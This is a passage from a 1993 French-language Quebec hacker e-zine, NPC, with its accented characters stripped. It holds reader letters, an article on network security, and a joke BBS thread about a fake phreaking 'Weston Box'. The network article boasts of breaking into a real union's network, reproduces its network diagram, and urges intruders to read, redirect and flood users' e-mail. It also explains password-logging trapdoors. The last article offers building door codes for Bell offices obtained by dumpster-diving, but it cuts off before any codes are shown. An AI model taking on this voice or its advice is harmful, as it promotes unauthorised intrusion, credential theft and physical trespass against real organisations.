auraient fait quelque chose. La plante agonise, l'conomie se crache les poumons, les pauvres mangent leurs bas, seuls les politiciens trou-du-culs s'enttent ne rien voir. Voil pourquoi la subversion est ESSENTIELLE! Comme le dit l'oncle Sam, en pointant son grand doigt pas trs propre, tout juste sorti du cul de l'attorney gnral: Young men, la patrie a besoin de vous, Merlin L'Emmerdeur BELL, DES GENS DE PAROLE LE FACTEUR QUOTE TOUJOURS DEUX FOIS Votre courrier Encore une fois, cette semaine, nous ne publions que quelques lettres parses, le corps des messages NPC se retrouvant dans nos messageries publiques, et donc accessible tous. Cependant, certaines lettres aboutissent tout de mme ici, soit pour la qualit de la prose et/ou pour la pertinence ou l'impertinence des remarques. Si vous voulez tre publis dans NPC -le mensuel-, dbrouillez-vous pour nous laisser quelque chose de song! La premire lettre nous a t envoye par, vous l'auriez devin en la lisant, Mphisto. ------ Taxi! A la morgue, s.v.p (Les extraits entre guillemets sont de l'auteur, THX 1138) Ce texte, de THX 1138, dborde d'inepsies. "... Northern Phun Co. ...cette ... gang de fous." L'auteur, d'abord, traite l'quipe de Northern Phun Co. de gang de fous. Schizophrne avanc, il en fait lui-mme partie. "... tu essaies d'avoir le moins de contacts possible avec l'autre ralit, celle qui t'attend sur le seuil de ta porte." C'est la dfinition mme de cette maladie mentale, la schizophrnie. Rien dans la suite de ce texte ne va donc me surprendre. L'auteur se replie sur sa petite ralit mentale, le cyberspace, et tout le reste n'existe plus. Si les jeunes assassins du taxi s'taient adonns la tlmatique, ce meurtre n'aurait pas eu lieu. "Je gagerais mon modem qu'aucun de ces 5 malfrats ne possde d'ordi et de modem." Donc, pour combattre la criminalit juvnile, vive l'informatique. Quel rapport! Tout le monde sait qu'avant l're informatique, cette criminalit tait quasi inexistante. Lisez la perle qui suit: "... la dissidence lectronique, telle que prne par NPC, PROTEGE en ralit la population." Si tous lisaient NPC, il n'y aurait plus de crimes... Et encore: "...si ces comiques avaient lu NPC, il n'y aurait pas eu cinq vies de gches..." Un seul pouvait le tuer! Ce qui est inacceptable, mme chez les NPCiens, j'ose le croire, c'est que dans toute la suite du texte, l'auteur argumente que c'est correct de tuer un chauffeur de taxi. Ils sont tous fascistes. Ils haissent tout le monde: les Arabes, les Indiens, les Juifs, les Israliens, les immigrants, les jeunes, les femmes, les noirs, eux-mmes. Alors tuons les chauffeurs de taxi. "Dlivrons-les de leurs souffrances." L'auteur avoue qu'il est terroris par la haine des chauffeurs de taxi. Et c'est la faute Andr Arthur. Ce n'est pas la faute Andr Arthur. Tout ce que tu as racont n'existe que dans ton pauvre cerveau. Tu souffres de schizophrnie. S'il n'y avait que a! Tu es possd par la haine des adultes. Un malade de ton espce souffre de tout ce qui reprsente le pre. La peur du pre, la haine du pre. Tu n'as pas encore rgler ton complexe d'Oedipe. Pour la plupart des jeunes, "... la pubert suffit gnralement les remettre dans le droit chemin..." Pour toi, a n'a pas suffit. Je ne demande qu'une chose: NPCiens, dans votre no 4, ne publiez pas les crits d'un malade mental. ------------------- Blitzkreig rpond: T'as bien raison, Raoul. Nous n'avons que faire de la prsence d'un psychopathe dans nos rangs. Mental Floss et moi l'avons coinc au tlphone, et lui avons dit notre manire de penser. Il est au courant que ce numro de NPC est consacr aux bonnes actions qui peuvent tre poses par les H/P, et il nous a promis de nous crire quelque chose en ce sens- l... ---------------------------- SECTION : Northern Phun Co., #1530 (PRIVEE) DATE : 19/02/93 19:52 (RECU LE 20/02/93 17:41) DE : M. B. A : Blitzkreig SUJET : $$$$ Pourquoi pas ecrire sur: Tous les moyens de se servir de son ordi a des fin monetaires$$$ Vaut-il la peine de caller LD Un 14.4...ou un 300 Backdoor Un autre virus mais en assembleur Meilleurs virus disponibles sur le marche! ........ ----------------------- Blitz rpond: Pour les virus, on a Jack Damme qui s'en vient de Montral ds le prochain numro (un ex de NukE, je crois). Pour les moyens de faire des sous avec les ordis... Le profit n'est pas notre principal motivateur... Vaut-il la peine de caller LD: c'est srieux, cette question? Les backdoors: il y a bien d'autre chose faire dans le HP que de trasher des boards, si tu veux mon avis. Une liste des meilleurs virus sur le march: Ca c'est une BONNE ide! On s'y met ds le prochain numro! C'est dj tout pour le courrier... on va pas gonfler inutilement le mag avec des messages ;-) MERCI D'UTILISER L'INTERURBAIN BELL A LA QUEUE LEU-LEU LA SCURIT DES RSEAUX par Blitzkreig Que vous les appeliez LAN (Local Area Network), rseaux, ou OSI (Open System Interconnection), c'est du pareil au mme. Les rseaux, c'est la faon qu'ont trouv les compagnies pour grer le travail de leurs employs, pour faciliter la communication entre les diffrents services (E-mail), pour maximiser le rendement de l'investissement en quipement informatique, et pour uniformiser les mthodes de travail. Les rseaux se construisent avec du hardware (les connecteurs Ethernet, par exemple), et avec du software, que ce soit Novell ou Lantastic. Ce dernier soft, Lantastic, est d'ailleurs le favori des hackers qui ont soif de systmes, car les files contenant les mots de passe des usagers ainsi que leurs codes d'accs sont plus facilement accessibles que sur n'importe quel autre logiciel. Les rseaux maillent la vie du praticien du H/P, car tu les retrouves partout: l'cole, l'entreprise, dans la plupart des systmes gouvernementaux, bref, ils sont incontournables. Dernirement, l'un d'entre nous dgot, en scannant les 800 pour les carriers, un systme bas Washington. L'entreprise s'appelait la UNITED FOOD AND COMMERCIAL WORKERS UNION. On a dnich dans leur banque de donnes le diagramme de l'installation de leur rseau. Nous vous le prsentons ici titre d'exemple, afin que vous vous fassiez une ide prcise du fonctionnement d'un rseau-modle au sein d'une entreprise. Exemple d'tage - 7 au 9 plancher ͻ Printer Workstation Netport Ŀ IJ Workstation Shared Ŀ Printer Workstation Ŀ Ĵ RJ45 Patch Shared Panel Rack Mount Printer İ Xircom Laptop Concentrator ͼ Headquarters Gateway Voice Server 4 lignes Concentrator Ŀ 5 Communications NetWare  Fax Voice Modems servers servers  Server ı ı ı Ĵ RJ45 Facility management ĴPANEL Workstation Ĵ İ T-1 Tape Gateway Backup server Network Administration Workstation ͻ Alexandria Data T-1 Center IJı Host LAN Unisys A-11 Connection ͼ Nous avons eu de la chance de tomber sur ce syndicat, car le fait qu'ils ngocient des conventions collectives travers les USA explique qu'il y avait trois nodes leurs bureaux centraux. C'est par l que nous sommes rentrs . Mais assez parl des rseaux, car je vous connat, bande d'obsds: vous dsirez tout simplement savoir comment les hacker! Pour ce faire, mettez-vous cinq minutes dans la peau d'un oprateur, d'un sysadmin, responsable d'un rseau de grande envergure. Vous avez entre les mains une belle bte que le moindre microbe peut terrasser. Apprenez d'abord identifier vos ennemis... pour connatre vos vulnrabilits. Vous ne voulez pas EMPECHER les gens d'accder au systme, bien au contraire. Sauf que ces usagers doivent obir strictement au protocole d'accs que vous avez instaur. Si votre systme n'est connect sur aucune ligne tlphonique accessible de l'intrieur (comme plusieurs banques, les industries de la dfense, etc), les possibilits de dfaillance sont restreintes. Bris des composantes, pannes d'alimentation et employs fraudeurs sont vos seuls ennemis. On s'assure d'avoir des systmes de backup et du hardware fiable pour contrecarrer les effets de l'un, et on protge PHYSIQUEMENT l'accs aux terminaux en enregistrant les usagers pour l'autre. Si, par contre, on peut communiquer avec votre systme de l'extrieur, vous venez de vous compliquer la vie... La premire chose qu'un sysadmin va faire, tout comme le sysop de n'importe lequel BBS qui se respecte, c'est de ne JAMAIS donner un utilisateur plus d'accs qu'il n'en a besoin. Si la hirarchie de votre politique d'accs exige que M. Untel puisse utiliser exclusivement le traitement de textes et le chiffrier, vous ne lui laisserez pas un accs superuser... C'est simple, non? Ce mme accs de superuser, gnralement reli aux sysadmins, doit lui aussi tre protg de manire ce que les petits curieux ne puissent pas avoir accs aux commandes de configuration du rseau. Une autre vrit qui relve de l'vidence, mais qui est parfois oublie... Nous reviendrons plus tard aux mthodes de protection gnralement utilises par les sysadmins qui ont du beat, mais revenons la case dpart, c'est dire l'identification des problmes qui peuvent subvenir sur un rseau, et qui n'impliquent pas le hardware, le software ou l'alimentation. Il est bien entendu qu'une attaque sur un rseau peut impliquer un mlange savamment dos de plusieurs de ces mthodes... Mettons de l'ordre dans nos ides... 1) Blocage d'accs: cette forme d'attaque se produit quand un utilisateur, en rgle ou non, empche un ou plusieurs autres utilisateurs du systme d'utiliser de manire fonctionnelle leur accs. Tous intrus sur un systme quip de E-mail, de poste lectronique, devrait chercher de ce ct les moyens de, non seulement lire le courrier des autres et le rediriger, mais de s'arranger pour "emballer" la machine afin que le E-Mail soit produit de faon continue, engorgeant trs rapidement les systmes avec des units de sauvegarde rduites, ce qui aura pour effet de barrer le systme. 2) L'imposteur: Ciel, c'est nous, ! Ben, a s'explique vachement bien, non? Tu as trouv le code d'un usager en rgle, et tu pntres le rseau avec son accs... 3) Modification des messages: peut tre ralis par un intrus ou, ce qui arrive gnralement dans la plupart des cas, par un usager en rgle. Le dernier mmo du service des dplacements disait: "Versez $ 800 Paul Paroix pour son voyage, et dbitez le compte de Paul Paroix". Quelle ne serait pas la surprise de ce cher Paul si le message, aprs manipulation, disait: "Versez $ 800 Pierre Caheut pour son voyage, et dbitez le compte de Paul Paroix". 4) La trappe souris: Une "trapdoor", comme on dit gnralement en bon franais, c'est un petit programme, import d'un autre systme, ou crit sur le rseau, et qui modifie le programme d'acquisition des mots de passe pour qu' chaque fois que quelqu'un se logge sur le rseau, le programme, en plus d'excuter la fonction d'authentification de l'usager et d'enregistrement de son heure d'accs (et toute cette sorte de chose), CRE un fichier SPCIAL o il note tous les noms et mots de passe. Le petit malin qui a crit cette trapdoor peut revenir plus tard et, grce une ou deux commandes bien choisies, rcuprer ce fichier secret. Le pactole, les kids! C'est d'ailleurs grce ce type de programme, de trapdoors, que le Chaos Computer Club s'tait rendu clbre, la fin des annes 80. Plusieurs allemands, dont le clbre Pengo, avaient ainsi hack les systmes de la NASA, jusqu' l'os... et avaient tent de vendre le fruit de leur labeur l'Allemagne de l'Est... 5) Trojan: Pour ceux qui viennent de se joindre nous, et qui ne sauraient pas ce qu'est un trojan, il s'agit d'une marque de condoms... Ha! Et si vous croyez cela, vous tes peut-tre mieux de fermer ce magazine et d'aller acheter ALLO-POLICE... C'est a qui est a... Ce sont les cinq dangers qui, en gros, menacent les rseaux. Plus prcisment, les cinq dangers RECENSS par les constructeurs de rseaux. Toute autre forme d'attaque que vous pourriez concevoir couperait dans leurs scurits comme dans du beurre. En passant, si vous devisez une nouvelle tactique, contactez-nous! Si vous trouvez, par exemple, un moyen de a) capturer le fichier encrypt des users et de leur mot de passe, et que B) vous connaissez l'algorithme d'encryptage, les sysadmin n'y verront que du feu. Pourquoi? Parce qu'ils travaillent tous avec leur bible, et que leur bible dit ceci et pas autre chose... Cette bible s'appelle OPEN SYSTEMS INTERCONNECTION REFERENCE MODEL (OSIRM), addenda 2 de OSIRM (ISO 7498-2), publie en 1989. La bible est formelle, les kids, elle ne reconnait que ces 5 types d'attaques, et ne propose des rponses stratgiques qu' ces attaques seulement. Et encore, a s'adresse UNIQUEMENT aux sysadmins qui savent lire! Parce que... comment vous dire... des rseaux qui appliquent les mesures de scurit qui vont suivre, conformment aux recommandations de la bible, il n'y en a pas des chars. N'est-ce pas, Coaxial? ;-) LES CINQ MESURES DE SCURIT DES RSEAUX Les cinq rponses proposes aux sysadmins se rsument en quelques mots: -authentification de l'usager -contrle des niveaux d'accs -confidentialit des donnes -vrification de l'intgrit des fichiers -authentification de la date d'originale des fichiers Et autour de cela, il y a plein de mesures effectives qui se greffent, pour palier toutes les ventualits que les crivaillons de la bible ont imagin. Ces mesures sont, dans l'ordre et dans le dsordre... ENCRYPTAGE The SubHuman Punisher, lou soit son handle, nous prpare pour le mois prochain un texte plutt fouill sur la question (probablement un rip d'un T-file serbo-croate traduit du latin ancien, s'il faut en croire les lgumes qui font office de dtracteurs de NPC). Je ne tenterai pas de surenchrir sur cet ouvrage qui fera date, et me contenterai donc de dsigner plutt les niveaux o l'encryptage devrait avoir sa place. Besides, a va tre moins compliqu pour moi ;-) L'encryption devrait, dans un systme qui se veut scuritaire, avoir lieu au moment de l'archivage des donnes, donc sur les fichiers mmes, et au niveau de la transmission elle-mme des donnes sur le rseau ainsi que sur les fils du tlphone. CONTROLE DE L'ACCES A) Listes des capacits d'un usager: c'est l'quivalent de la liste des usagers que les sysops de babs connaissent bien. A chaque commande d'un usager, le programme vrifie si l'usager en question est autoris utiliser cette commande. B) Mots de passe: L'utilisation de mots de passe par les usagers... bof, vous tes capables de deviner celle-l, non? Si il y a une chose que je dteste, c'est crire pour ne rien dire... Ceci dit, la fucking bible des sysadmins conseille de multiplier les niveaux de mots de passe. Idalement, il faudrait qu'un usager soit appel entrer un mot de passe chaque commande qu'il fait. Ca serait pratique d'abord! C) Liste de contrle d'accs: Comme sur les babs, encore une fois, le systme vrifie si un usager accs ce rseau. VRIFICATION DE L'INTGRIT DES FICHIERS On parle ici de beaucoup plus que la vrification habituelle des fichiers uploads sur un bab, en ce sens que les fichiers sont analyss, pour savoir s'ils contiennent des virus, certes, mais aussi afin de savoir si, d'un jour l'autre (la bible recommande des inspections quotidiennes du contenu du systme), la taille des fichiers ou leur date originelle n'a pas t modifie, ce qui indiquerait la prsence d'un trojan ou d'un trapdoor. MODIFICATION DES ROUTES DE DONNES Pour les rseaux VRAIMENT pousss, et j'entends par l les systmes qui contiennent des donnes, comme on dit, cruciales, il existe aussi la modification des routes de donnes. Ca consiste en gros ne jamais utiliser deux fois de suite les mmes lignes et le mme rseau de communication chaque fois que des packets voyagent. Les compagnies propritaires de leurs lignes data peuvent, par exemple, transfrer d'un trunk l'autre le flot des donnes, pour fucker ceux qui seraient directement branchs sur la ligne de transmission. Encore l, ce genre d'arrangement est plutt sophistiqu, si vous voulez mon avis. Mais il est utilis: les caisses Desjardins, par exemple, sont PROPRITAIRES de trois cbles de fibre optique qui relient les bureaux de Montral et ceux du sige social de Lvis. Et c'est sans parler des backups. Le Bell gre trois Datapak optiques, exclusifs Desjardins, au cas o le premier systme ferait dfaut. Et comme si ce n'tait pas assez, Desjardins loue une ligne satellite Tlcom Canada... C'est ce qui s'appelle prvoir pour le pire, les petits gars... LES TRUCS CARRMENT FARFELUS Vous avez dj entendu parler des vibrations captes sur les fentres avec des faisceaux lasers? Pour rsumer (et c'est bien parce que le prochain James Bond n'est pas pour demain: que fait Brocoli?), lorsque quelqu'un parle dans une pice, il met des vibrations. Si il y a par exemple une fentre dans la pice, celle- ci va vibrer au son de la voix, de la musique, etc... Un faisceau laser braqu sur ladite fentre peut, avec l'quipement appropri, valuer distance les vibrations de la fentre, et restituer ce qui se dit dans la pice. Pt, quand mme... Comme dirait Mental Floss, il y a du monde de pas mal rong... Et c'est tout! C'est tout ce qu'ils ont invent pour protger leurs rseaux! Ils ne sont mme pas foutus, pour les appels extrieurs, d'instaurer une procdure standard de rappel automatique (comme les valideuses des babs). Il y a bien quelques compagnies qui tentent de pousser l'instauration de cls-codes (une cl-code, c'est un bidule lectronique qui met un signal que le node du rseau reoit, et qui authentifie l'usager. Si l'ordi de la personne qui communique ne possde pas la bonne cl lectronique, le logon ne fonctionne pas), mais l'instauration de telles mesures sur tous les systmes n'est pas pour demain. Et puis, chaque offensive des sysadmins pour nous chasser comporte sa parade... Des systmes, pour peu que vous hackiez un tant soit peu, vous allez en rencontrer. Et vous allez vous apercevoir que la quasi-majorit des rseaux n'est pas foutue d'appliquer des rgles de scurit lmentaires... Remarquez, les sysadmins sont des tres humains, aprs tout. Ils sont bien souvent trop peu pour le nombre d'appareils qu'ils doivent superviser. Et qui plus est, la majorit du temps qu'ils pourraient consacrer la protection de leurs systmes est en ralit consacre aller dpanner la secrtaire du boss qui est gele dans Word Perfect, ou le petit cadre la comptabilit qui ne trouve plus son escape key. Quand tu passes ton temps teindre des incendies, comment veux-tu trouver le temps d'installer un dtecteur de fume? Pas que ca servirait grand chose, remarquez. Il n'y a pas de systme qui ne peut tre craqu par un pirate possdant les bons outils (HADES me vient l'esprit) et un minimum de connaissances... Hasta la vista, les pros! MERCI D'ABUSER DE L'INTERURBAIN BELL MEUNIER, TU DORS, TON MOULIN VA TROP VITE... La Bread Box par -=ThE PoSSe=- Ok les mecs... voici un petit log d'un change, avec The Subhuman Punisher et Atreid Bevatron dans les rles principaux, ainsi que Blitzkreig et Mental Floss comme figurants. Tout ce qui suit a t captur sur "The HelloweeN BoarD", un BBS "renomm" de 418, avec au moins un "LD", (un appeleur de 305/Miami), Toxic Threat pour ne pas le nommer. La prsence de cet amricain fait d'ailleurs que le sysop EXIGE de tous que les messages soient crits en anglais... Ce qui a parti le bal, c'est un message de Crime Lord dans lequel il demandait "Does anyone knows how to hack the new payfones". Il parlait bien sur des nouveaux bolides du Bell, les Milleniums, ces nouveaux tlphones publics qui acceptent les cartes de crdit...A partir de l, a a dgnr, et NPC est fier de vous prsenter la Weston Box, a/k/a la Bread Box... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 15 of 96 [When ]: 1/1/92 At 4:19 pm [Subject]: New PayPhone [Reply #2] [To ]: AtrEiD BeVaTRoN [Received] [From ]: The SubHuMaN PunisheR <[NpC MeMBeR]> Ever heard about COCOTs ? Customer-Owned Coin Operated Telephone? Those can be hacked. Anyway. BTW, did i tell you how i hacked my toaster? Great! All you need is WESTON white bread and a toaster. First, buy a 864565 OHmz crystal, 2,5 watts condensators, and some alligator clips (with some wires). Plug the clips into the condensators, one end on the crust, the other in the right slot of the toaster, condensators in the middle. Upwire the crystal upside down on the flipped side of the backward toaster (still following?), and do a 360 rotation on the Y axis of the bread. Don't care 'bout the grains falling. Then plug your alligators on another slice, and mix the two slices. Here's an awesome schema showing what your new WESTON BOX will look like... /~~~~~\ ____/~\~~~~\~~~~\ o--\+~X_/ \ . \ . \ \ / \ \ . \ . \  /___\ \______ \ . \ . \-----<~~~~~\ \ \____\____\ . . \ _ \ . / \_ /_____\ \_________ You now have modified your toaster so that it could grill 4 bread slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than that!!!! If you plug the alligators on your phone line, you will get free calls everywhere in the WORLD!!!! So now you can call everywhere for free, and grill 4 slice of breads at the same time!!!! Fantastic eh? Till later bud! TSP %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 18 of 96 [When ]: 1/1/92 At 5:20 pm [Subject]: New PayPhone [Reply #3] [To ]: The SubHuMaN PunisheR [Received] [From ]: AtrEiD BeVaTRoN > BTW, did i tell you how i hacked my toaster? Great! All you need > is WESTON white bread and a toaster. I don't buy WESTON bread... Is that OK with some Multi-Mark? > and do a 360 rotation on the Y axis of the bread. Well... I think it's surely not a 360 rotation... probably a 40,56 rotation on the X axis of the bread... With a 360 on the Y, you'll burn your bread everytime..... and when you'll try to call, they will be able to trace you... but not with a 40,56 on the X... > /~~~~~\ ____/~\~~~~\~~~~\ > o--\+~X_/ \ . \ . \ > \ / \ \ . \ . \ >  /___\ \______ \ . \ . \-----<~~~~~\ > \ \____\____\ . . > \ _ \ . / > \_ /_____\ > \_________ Yeah!!! NOW, I know what you're talking about! >You now have modified your toaster so that it could grill 4 bread >slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than >that!!!! If you plug the alligators on your phone line, you will >get free calls everywhere in thw WORLD!!!! So now you can call >everywhere for free, and grill 4 slice of breads at the same >time!!!! Fantastic eh? WHAT?!?! Is that possible? You mean that you can CALL EVERYWhere in the world AND grill some bread AT THE SAME TIME?!?? Well... You surely have the new brand of CPU... I've only a 6478HarQ in MY toaster... It's quite poor in multi-tasking... You probably have a 6878HarT... Those are newer and really better!! But... I've a question... : What do you have to do when you want to hang-up the phone? You take the bread off?? It could be good to put a switch or something... Well... I'm working on some ARTIFICIAL bread for your board... I'll give you all the news about that... Did you ever tried that with a steak? Pretty cool... Later moron... ;) AtrEiD %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 23 of 96 [When ]: 1/1/92 At 10:33 pm [Subject]: New PayPhone [Reply #4] [To ]: AtrEiD BeVaTRoN [Received] [From ]: The SubHuMaN PunisheR <[NpC MeMBeR]> ĵ > BTW, did i tell you how i hacked my toaster? Great! All you need ĵ > is WESTON white bread and a toaster. ĵ ĵI don't buy WESTON bread... Is that OK with some Multi-Mark? No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I should introduce you to a Weston bread party! All you need is a 6-pack of Weston and peanut butter. Pretty cool. ĵ > and do a 360 rotation ĵ >on the Y axis of the bread. ĵ ĵWell... I think it's surely not a 360 rotation... propably a 40,56 rotation ĵon the X axis of the bread... With a 360 on the Y, you'll burn your bread ĵeverytime..... and when you'll try to call, they will be able to trace ĵyou... but not with a 40,56 on the X... Maybe... but that way, you could'nt call an inward operator. Anyway, ANI/ESS is not yet implemented on the BreadLines, so why bother covering your ass? AB> > /~~~~~\ ____/~\~~~~\~~~~\ AB> > o--\+~X_/ \ . \ . \ AB> > \ / \ \ . \ . \ AB> >  /___\ \______ \ . \ . \-----<~~~~~\ AB> > \ \____\____\ . . AB> > \ _ \ . / AB> > \_ /_____\ AB> > \_________ AB> AB> Yeah!!! NOW, I know what you're talking about! Hope you do. But I will get out the IMPROVED WESTON BOX in the near future. Look for it, I will include GIFs. ĵ >You now have modified your toaster so that it could grill 4 bread ĵ >slots AT THE SAME TIME!!!!#$%%$^&$%^& Cool eh? And more than ĵ >that!!!! if you plug the alligators on your phone line, you will ĵ >get free calls everywhere in thw WORLD!!!! So now you can call ĵ >everywhere for free, and grill 4 slice of breads at the same ĵ >time!!!! fantastic ! ĵ ĵWHAT?!?! Is that possible? You mean that you can CALL EVERYWhere in the ĵworld AND grill some bread AT THE SAME TIME?!?? Well... You surely have the ĵnew brand of CPU... I've only a 6478HarQ in MY toaster... It's quite poor in ĵmulti-tasking... You probably have a 6878HarT... Those a newer and really Yeah!!!!#%$ k-rad isn't it? I have a 6578HarQ... but your trouble is e-z to solve; get a 806358P2H3P grill accelerator. And if it isn't enuff, get a 6479GarQ co-processor. ĵWhat do you have to do when you want to hang-up the phone? You take the ĵbread off?? That could be good to put a switch or something... If you'd have half-a-brain, you would have figured out that the GRiLL control Panel is similar to the AT command set. ĵDid you ever tried that with a steak? Pretty cool... No i didn't... But i think that you just have to take a BB-Q grill instead of a toaster ?! I'd suggest a T-Bone, cause they have a voltage control panel included. Till later, fuckface! TSP %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 30 of 96 [When ]: 12/31/199 At 7:05 pm [Subject]: New PayPhone [Reply #5] [To ]: The SubHuMaN PunisheR [Received] [From ]: AtrEiD BeVaTRoN >No! NO! NOOOO! Hey! The WESTON is the next generation's bread! I >should introduce you to a weston bread party! All you need is a >6-pack of weston and peanut butter. pretty cool. Are you really sure of that??? Humm... Kinda strange... But I'm really interested about the weston bread party... that could be "MeGA-C0oL"!! But... I don't like peanut butter... May I just buy some jam? >ĵWell... I think it's surely not a 360 rotation... propably a 40,56 >ĵon the X axis of the bread... With a 360 on the Y, you'll burn you >ĵeverytime..... and when you'll try to call, they will be able to t >ĵyou... but not with a 40,56 on the X... > >Maybe... but that way, you couldn't call an inward operator. Anyway, >ANI/ESS is not yet implemented on the BreadLines, so why bother >covering your ass? Did you ever try to use a Jam Box with your Weston Box? With that, you'll be able to use your 2 boxes as if they are a "Phone of the future"... >Yeah!!! NOW, I know what you're talking about! > > Hope you do. But I will get out the IMPROVED WESTON BOX in the >near future. Look for it, I will include GIFs. What do you think about a EGA/VGA interface? I can do that for U... since you've found a new way to the phreaking life! >Yeah!!!!#%$ k-rad itsnt it? I have a 6578HarQ... but your trouble >is e-z to solve; get a 806358P2H3P grill accelerator. And if itsnt >enuff, get a 6479GarQ co-processor. Humm... I've a friend with an Amiga... He has the VIDEO TOASTER card... is that good for your Weston Box? I've heard a lot about it... >If you'd have half-a-brain, you would have figured out that the >GRiLL control Panel is similar to the AT command set. Gimme the string to configure my Bread... is that : BREAD GRILL 4441919 TOAST BEACON EGG or BREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST I can't figure it out... >No i didnt... But i think that you just have to take a BB-Q grill >instead of a toaster ?! I'd suggest a T-Bone, cause they have a >voltage control panel included. My BBQ grill is out of date.... I mean... it doesn't work with gaz... I've an old Charcoal BBQ... That could be a waste of charcoal... and if BELL or the COPs see the smoke.... ooohh.... they will know I'm a phreaker.... Later, G0D of Phreak! AtrEiD %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 33 of 96 [When ]: 12/31/199 At 8:13 pm [Subject]: New PayPhone [Reply #5] [To ]: The SubHuMaN PunisheR [Received] [From ]: Blitzkreig Yo! I've tried your shit with a Pop Tarts in my toaster... K-RaD! I got meself full control on the two canadian satellites. Actually, Anik is, by my own command, beeming lots of microwaves to your house... Don't you smell something burning? Your brain perhaps? ---=BlItZkReIg=--- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 36 of 96 [When ]: 12/31/199 At 9:12 pm [Subject]: New PayPhone [Reply #6] [To ]: AtrEiD BeVaTRoN [Received] [From ]: The SubHuMaN PunisheR <[NpC MeMBeR]> ĵ >Maybe... but that way, you couldn't call an inward operator. Anyway, ĵ >ANI/ESS is not yet implemented on the BreadLines, so why bother ĵ >covering your ass? ĵ ĵDid you ever try to use a Jam Box with your Weston Box? With that, you'll be ĵable to use your 2 boxes as if they are a "Phone of the future"... Yeah... i've already thought about that. But i soon found out that a Lunch Box is way more than a Jam Box; cause it have all the jam's advantages, and it is pectine free! ĵ > Hope you do. But I will get out the IMPROVED WESTON BOX in the ĵ >near future. Look for it, I will include GIFs. ĵ ĵWhat do you think about a ega/vga interface? I can do that for U... since ĵyou've found a new way to the phreaking life! Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker support and mega-kewl ASCIi grfx! ĵ >If you'd have half-a-brain, you would have figured out that the ĵ >GRiLL control Panel is similar to the AT command set. ĵ ĵGimme the string to configure my Bread... is that : ĵ ĵBREAD GRILL 4441919 TOAST BEACON EGG ĵ ĵor ĵ ĵBREAD TOASTER PHONE 4441919 EGG ORANGE JUICE BREAKFAST ĵ ĵI can't figure it out... Mine is: Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am now working on a bread box that would act like a phone directory. ĵMy BBQ grill is out of date.... I mean... it doesn't work with gaz... I've ĵan old Charcoal BBQ... That could be a waste of charcoal... and if BELL or ĵthe COPs see the smoke.... ooohh.... they will know I'm a phreaker.... And you'll be toasted... Later, Elite d00d. TSP %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 40 of 96 [When ]: 12/17/187 At 6:11 pm [Subject]: New PayPhone [Reply #7] [To ]: The SubHuMaN PunisheR [Received] [From ]: AtrEiD BeVaTRoN >Yeah it would be B00MIDY/Fuzzy/Funky//<-rad! With PC Speaker >support and mega-kewl ASCIi grfx! Yeah like the Lancelot magazine... as good as it... ;-) >Mine is: >Salami/Ham/Egg=1 Grill=3,5 GrillTime=1,75 ReToastPause=20. I am now >working on a bread box that would act like a phone directory. Hey! This stuff is not legal!!!! If you do that, you'll be a criminal, SO STOP NOW or BELL will put you in jail! > My BBQ grill is out of date.... I mean... it doesn't work with gaz.. > ĵan old Charcoal BBQ... That could be a waste of charcoal... and if B > ĵthe COPs see the smoke.... ooohh.... they will know I'm a phreaker.. > > And you'll be toasted... DEAD burn... ;-) AtrEiD %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% [Message]: 41 of 96 [When ]: 10/9/146 At 6:34 pm [Subject]: New PayPhone [Reply #5] [To ]: The SubHuMaN PunisheR [Received] [From ]: Mental Floss TSP> introduce you to a weston bread party! All you need is a TSP> 6-pack of weston and peanut butter. pretty cool. Nah man, you're wrong... for a Weston party..you need to come with a yellow electric guitar (without the case, quite important)... Invite some of your long-hairs friends...and together put peanut butter on some slide when watchin MUSIC PLUS... pretty cool party uh? And remember... Weston, your generation's favorite... ...ask for it by name... later %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Eh oui... dj termin.... -L'eau gude baille Subhuman Punisher fort Fonne Ouique One Laine- MERCI DE SWITCHER A UNITEL IL FAUT RENDRE A CSAR CE QUI APPARTIENT A CSAR ou OUVREZ LES PORTES, QUE L'ON RESPIRE! par THX 1138 Mental Floss et Blitzkreig m'ont dit que ce numro, le 4, tait consacr au thme "AYEZ UNE CONSCIENCE SOCIALE". "THX, m'ont-ils dit, il y a des gens qui te trouvent trop heavy. Tu passes pour un psychopathe aux yeux de certains. Fait preuve de civisme. Comme les scouts, tiens: fais donc une bonne action envers la socit". Pas de problme, leur ai-je dit, je vais recommander aux gens d'aller payer leurs comptes de Bell. Tu peux pas tre plus civique que a, me semble. Et une fois n'est pas coutume. On sait que la compagnie a un NORME besoin d'argent, alors... Alors, les amis, allez payer vos comptes aux bureaux du Bell de votre rgion. Mais si, par hasard, vous arrivez, excellents citoyens que vous tes, la porte d'un bureau du Bell et que personne ne rponde vos sonneries, voici les codes des portes de TOUS les bureaux du Bell de la grande rgion de Qubec. Vous pourrez ainsi aller payer vos comptes toute heure du jour ou de la nuit. Surtout la nuit... J'ai trouv ce petit carnet lors d'un trash en solitaire. Il s'agit fort probablement d'une liste distribue aux techniciens qui font l'entretien de tous les systmes de ces endroits. La liste n'est plus valable, apparemment, depuis le 1er 